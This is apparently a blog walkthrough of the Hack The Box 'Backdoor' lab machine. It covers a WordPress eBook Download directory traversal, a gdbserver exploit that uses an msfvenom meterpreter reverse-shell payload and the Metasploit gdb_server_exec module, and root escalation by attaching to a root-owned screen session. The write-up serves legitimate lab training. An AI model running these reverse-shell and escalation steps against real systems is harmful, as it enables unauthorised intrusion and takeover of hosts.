In this post, I would like to share a walkthrough of the Backdoor Machine from Hack the Box

This room has been considered difficulty rated as an Easy machine on Hack The box

What will you gain from Backdoor machine?

For the user flag, you will use WordPress eBook Directory Traversal and use gdbserver exploit. For gdbserver exploit, i display two methods to get the user shell by manually exploiting and exploit using Metasploit

As for the root flag, you need to use SUID “shell” to get a root shell

Information Gathering on Backdoor Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

From the Nmap output, we only found ports 22 and 80 which leads to http://backdoor.htb

Let’s access the website interface to find any vulnerability that we can exploit

Sadly, we didn’t find anything that we can use for further escalation, but I notice the website has been powered by WordPress

Let’s run wpscan where it will show any vulnerability on WordPress

It will take some time to retrieve the result.

However, we can manually check the WordPress directory

Based on my experience using WordPress, normally there should be something on /wp-content/plugins

As a result of my research on the WordPress interface, we notice there’s an ebook-download directory that we can use in the future.

There’s a blank page when trying to access the filedownload.php file on the website.

Let’s do some research on the ebook-download exploit on the internet

Source: WordPress Plugin eBook Download 1.1 – Directory Traversal – PHP webapps Exploit (

From the result, we have found out that the ebook download is vulnerable to Local File Inclusion (LFI) which we can take advantage of.

We can test the Local File Inclusion by using the Burpsuite tool, but we also can use wfuzz to get an exact directory of the LFI.

We should be moving forward a little bit; we success retrieve one code that shows on gdbserver on port 1337

Step 1: msfvenom modules and

However, we were required to create malicious malware by using the msfvenom command such as msfvenom -p Linux/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<any port> -f elf -o <filename>.elf

Let’s start gdb on our attacker’s machine

Let’s access the machine using port 1337 by executing the command “target extended-remote

Sadly, the connection timed out.

We need to run it for the second time.

Finally, we need to run the following command as below:

remote put <filename>.elf <filename>.elf
set remote exec-file /home/user/<filename>.elf
show remote exec-file

You can start NC listener on your attacker’s machine

For us to retrieve our reverse shell connection back to us, we need to execute the following command

b main

Voila! We successfully retrieve the reverse shell connection back to us but we cannot obtain a proper shell

Step 2: Metasploit

I will skip the first step of metasploit usage while i will focusing on the execution of metasploit.

For this activity, we will be using multi/gdb/gdb_server_exec as our exploit from metasploit module

The screenshot above is an example of the settings that we should focus on with the exploit.

However, i almost forgot about the payload of the exploit which we need to execute the command “set payload linux/x64/meterpreter/reverse_tcp before proceeding with the command “run

At last, we have managed to get a meterpreterr by using those exploits with the configuration shown previously.

By typing the command shell will create channel 1 (metasploit way of shell).

We need to execute the command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ to obtain an interactive shell

As usual, we can read the user flag by running the “cat user.txt” command

Escalate to Root Privileges Access

We can run the command ps aux so that we can sight the process that runs on the victim’s machine

Uwu! We notice that the screen have been running on the machine as “SCREEN -dmS root

For those who are not familiar with Screen, it’s a terminal multiplexer which you can start a session with screen and can open any number of virtual terminals within that session.

Source: screen | GTFOBins

After reading on GTFOBins website, there are a few commands that we can take advantage of here.

When we execute the command screen -x root,an error such as “Must be connected to a terminal

The error occurs might be because we didn’t obtain a full proper shell here. For us to obtain a full proper shell here, we should execute the following command before trying again

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

We managed to obtain a root shell on the terminal

As usual, we can read the root flag by running the “cat root.txt” command


Happy Learning Guys!

Extra Information

We can go to /etc/shadow so that we can unlock and read the write-up